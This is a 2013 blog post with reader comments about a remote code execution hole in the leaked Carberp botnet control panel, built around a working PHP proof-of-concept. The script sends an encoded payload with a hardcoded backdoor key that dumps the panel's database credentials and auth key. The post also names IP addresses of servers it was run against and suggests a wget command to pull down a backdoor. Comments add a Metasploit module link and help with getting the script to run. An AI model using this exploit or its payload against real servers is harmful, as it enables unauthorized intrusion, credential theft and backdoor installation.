Friday, 28 June 2013

Carberp Remote Code Execution: Carpwned

Everyone are looking at the Carberp source, bootkit and other components but did people investigated the panels source ?
I don't know who did the PHP but he deserve a medal, it's more easy to hack than SpyEye. (yeah i didn't think it was possible too)

Here i will talk about a simple code injection but there is a lot of others vulnerabilities in theses leaked panels.
e.g: stupid code allow IP spoofing:

No but seriously the best vulnerability is the RCE one, the guys who coded this is really mentally retarded:
look at this eval() look !

Oh good timing, some Carberp C&C appeared on vx.vault:

Let's write a spl0it now, i think most of you come here for a PoC right ?
Carberp RCE
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
/*
Xyl2k!
Greeting to Xartrick for fixing the payload (:
*/
if(!isset($_POST['urlz'])) ;
else
if(!filter_var($_POST['urlz'], FILTER_VALIDATE_URL))
{
echo "<font color='red'>URL is not valid</font>";
}
else
{
{
$data = array(
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
'data' => 'Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYzNmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNiMjQ0MTNkMjIwZDBhMjIzYjY1NjM2ODZmMjgyNzQ0NjE3NDYxNjI2MTczNjUyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDg2ZjczNzQzYTIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY4NmY3Mzc0Mjc1ZDJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc1NTczNjU3MjNhMjAyNzJlMjQ2MzY2Njc1ZjY0NjI1YjI3NzU3MzY1NzIyNzVkMmUyNDQxMjkzYjY1NjM2ODZmMjgyNzUwNjE3MzczM2EyMDI3MmUyNDYzNjY2NzVmNjQ2MjViMjc3MDYxNzM3MzI3NWQyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDQ0MjNhMjAyMDIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY0NjIyNzVkMmUyNDQxMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjYzNmY2ZTZlNjU2Mzc0MjgyNDYzNjY2NzVmNjQ2MjViMjc2ODZmNzM3NDI3NWQyYzI0NjM2NjY3NWY2NDYyNWIyNzc1NzM2NTcyMjc1ZDJjMjQ2MzY2Njc1ZjY0NjI1YjI3NzA2MTczNzMyNzVkMjkzYjZkNzk3MzcxNmM1ZjczNjU2YzY1NjM3NDVmNjQ2MjI4MjQ2MzY2Njc1ZjY0NjI1YjI3NjQ2MjI3NWQyOTNiMjQ0MjNkNmQ3OTczNzE2YzVmNzE3NTY1NzI3OTI4Mjc1MzQ1NGM0NTQzNTQyMDJhMjA0NjUyNGY0ZDIwNjI2NjVmNzU3MzY1NzI3MzI3MjkzYjY1NjM2ODZmMjgyNzU1NzM2NTcyNzMyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNzc2ODY5NmM2NTI4MjQ0MzNkNmQ3OTczNzE2YzVmNjY2NTc0NjM2ODVmNjE3MzczNmY2MzI4MjQ0MjI5Mjk2NTYzNjg2ZjI4MjQ0MzViMjc2YzZmNjc2OTZlMjc1ZDJlMjczYTI3MmUyNDQzNWIyNzcwNjE3MzczNzc2ZjcyNjQyNzVkMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjY2NzI2NTY1NWY3MjY1NzM3NTZjNzQyODI0NDIyOTNiNmQ3OTczNzE2YzVmNjM2YzZmNzM2NTI4MjkzYjI0NDQzZDQ5Mjg2NjY5NmM2NTVmNjc2NTc0NWY2MzZmNmU3NDY1NmU3NDczMjgyNzY5NmU2NDY1NzgyZTcwNjg3MDI3MjkyOTNiNjU2MzY4NmYyODI0NDEyZTI3NDE3NTc0NjgyMDRiNjU3OTI3MmUyNDQxMjkzYjY1NjM2ODZmMjgyNzJkMmQyZDJkMmQyZDJkMmQyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc2ODc0NzQ3MDNhMmYyZjI3MmUyNDVmNTM0NTUyNTY0NTUyNWIyNzQ4NTQ1NDUwNWY0ODRmNTM1NDI3NWQyZTI3MmY2YzZmNjc2OTZlMmYzZjc4M2QyNzJlMjQ0NDI5M2I2Njc1NmU2Mzc0Njk2ZjZlMjA0OTI4MjQ0ODI5N2IyNDQ2M2Q2NTc4NzA2YzZmNjQ2NTI4MjcyNDYxNzU3NDZmNzI2OTdhNjU2YjY1NzkyNzJjMjQ0ODI5M2IyNDQ3M2Q2NTc4NzA2YzZmNjQ2NTI4MjczYjI3MmMyNDQ2NWIzMTVkMjkzYjY1NzY2MTZjMjgyNzI0NDUyNzJlMjQ0NzViMzA1ZDJlMjczYjI3MjkzYjcyNjU3NDc1NzI2ZTIwMjQ0NTNiN2Q=');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$contents = curl_exec($ch);
curl_close($ch);
if (preg_match("#-#", $contents))
{ echo "<pre>" . $contents . "</pre>"; }
else
{ echo "<font color='red'>Not vulnerable :(</font>"; }
}
}
?></td>
</tr>
</table>

The 'encoded' part do a file_get_contents() on includes/config.php
Then connect to the SQL db and show the Carberp credentials. (in case if we don't have phpMyAdmin)
But it would be useless if we can't show the login page due to Auth key so it parse index.php and retrieve it.
Cool payload huh ?
Let's test it so...

37.221.165.123:

91.214.202.117:

I've tested on some others C&C and everything went fine.
And it's a RCE so you can execute some cool shit like system('wget http://xxx.xxx');
To download a backdoor or whatever...

Here are some screenshots of the panel:

Bots:

Diagram all:

Diagram live:

Diagram OS:

Diagram AV:

Diagram Rights:
Wait... a 'diagram' ?!

Tasks:

Logs:

Passwd:

AutoSystem:

Settings:
oh really, who's fucked now ?




Posted by at 19:45
Labels: , , , , , , ,

35 comments:

  1. unixfreaxjp28 June 2013 at 20:02

    Nice stab!

    ReplyDelete
  2. Anonymous28 June 2013 at 20:39

    End up getting "URL is not valid"

    ReplyDelete
  3. hacktalk.net28 June 2013 at 20:45

    Very creative thinking to include the config.php file and then just echo'ing out the local variables that way

    ReplyDelete
  4. Anonymous28 June 2013 at 21:02

    Be very handy, but now that it's exposed people who know how to code will end up fixing it.

    But it will come in handy for the kids.

    ReplyDelete
  5. Anonymous28 June 2013 at 21:15

    nice one with kornheiser

    ReplyDelete
  6. Anonymous28 June 2013 at 21:45

    Another brutal ownage

    ReplyDelete
  7. Anonymous28 June 2013 at 22:37

    Maybe it intentionally left vulnerable as a backdoor to buyer panels..

    ReplyDelete
  8. TeamRocketOps28 June 2013 at 23:21

    Epic

    ReplyDelete
  9. Anonymous29 June 2013 at 00:46

    Bien vu :)

    ReplyDelete
  10. Anonymous29 June 2013 at 06:16

    You can find a few separate RCE vulns if you look around at some of the other web-accessible accessible files.

    ReplyDelete
    Replies
    1. Steven K29 June 2013 at 09:38

      yep this is not the only one, the panel is full of critical bugs.

      Delete
    2. Anonymous29 June 2013 at 18:16

      Yep. I think it's the most shittily coded PHP malware panel I've ever seen, which is pretty funny considering the pricetag on this thing.

      Delete
    3. Grey Hat Times Ed.30 June 2013 at 05:26

      I am curious, what is your preferred approach of finding holes in such software? Do you grep for things like eval() and SQL statements, or look at every file in order, or use automated scanners? A lot of people just fly by seats of their pants, but I get an impression that there's method to your madness

      Delete
    4. Anonymous30 June 2013 at 14:50

      I'm also wondering, really interested.

      Delete
    5. Anonymous1 July 2013 at 11:55

      Few 'simple example' arts about answering to your questions (how to find...) you will find at http://HauntIT.blogspot.com

      cheers

      Delete
  11. Anonymous29 June 2013 at 06:32

    wont be surprised if it was just one person who coded the entire project.

    ReplyDelete
  12. Anonymous29 June 2013 at 07:03

    How about you try to "exploit" zeus panel, :)

    ReplyDelete
  13. Anonymous29 June 2013 at 16:55

    I am curious did you learn about programming and everything else at university or self taught?

    Also know any good tutorials for beginners?

    ReplyDelete
  14. Anonymous29 June 2013 at 20:04

    Not actually an RCE. Maybe you think this key was the same on every c&c installation? Nope.

    ReplyDelete
    Replies
    1. Steven K29 June 2013 at 21:55

      It's the same on every C&C, install carberp on different servers and you will see.
      Did you even know what's you are talking about ?

      Delete
    2. Anonymous30 June 2013 at 10:57

      I'm not the guy you were talking to but i just checked it, i tend to get results but they all look like this

      (E¿¦g„±S^K ¨‘fyÆ}Ð N*£¤rÅÖt¾¤Ì} è뀡y)

      Delete
    3. Anonymous1 July 2013 at 16:03

      Of couse I know what I'm talking about.
      Did you see carberp C&C's insides before source leakage? I did. And I know a lot of different backdoor keys (BOTNETCHECKUPDATER0-xxx). Before leakage, every single client had its own ioncubed c&c with different backdoor key.
      Now, when script kiddies started installing leaked carberp c&cs, we can expect c&cs with the same backdoor key.

      Delete
    4. Steven K1 July 2013 at 16:12

      okay, i got no opportunity to look at the others carberp before this leak so i don't know what's look the no leaked version if they are differents.
      For the moment all carberp i looked into was from the leaked package and who use obviously all the same key.
      this is why i've says i tried on different servers and everything was correctly exploited.

      Delete
  15. Anonymous1 July 2013 at 10:27

    LMFAO, when you see it in the PHP documentation ... http://php.net/manual/en/function.eval.php

    ReplyDelete
  16. Anonymous1 July 2013 at 11:50

    metasploit module can be found here:
    http://packetstormsecurity.com/files/122230/carberp_backdoor_exec.rb.txt

    ReplyDelete
  17. Anonymous1 July 2013 at 12:08

    B-but your PoC is vuln to XSS! What if the evil C&C serves a browser exploit!

    Just kidding, thanks for the good read as always :)

    ReplyDelete
  18. Tweek Tweak1 July 2013 at 17:27

    How do you found carberp panel ?

    ReplyDelete
  19. Anonymous1 July 2013 at 18:02

    Writer, can you explain in sesamestreet lingo what you just have done. Whats can be done with these vulnerabilities.

    ReplyDelete
  20. Anonymous2 July 2013 at 15:31

    kiddie audience listens :-P

    ReplyDelete
  21. Unknown7 July 2013 at 04:52

    MASTER, please teach us how to find carberp panel

    ReplyDelete
  22. Unknown8 July 2013 at 20:28

    Fatal error: Call to undefined function curl_init()

    i dont know how is that i rename in php and open Via localhost ;) ???

    ReplyDelete
  23. Pernat1y24 July 2013 at 08:55

    I think, you don't have curl/php_curl installed

    ReplyDelete
  24. Anonymous19 August 2013 at 21:04

    Lol these people call themselves malware coders?
    This shit wasn't even worth 1$.

    ReplyDelete

Subscribe to: Post Comments (Atom)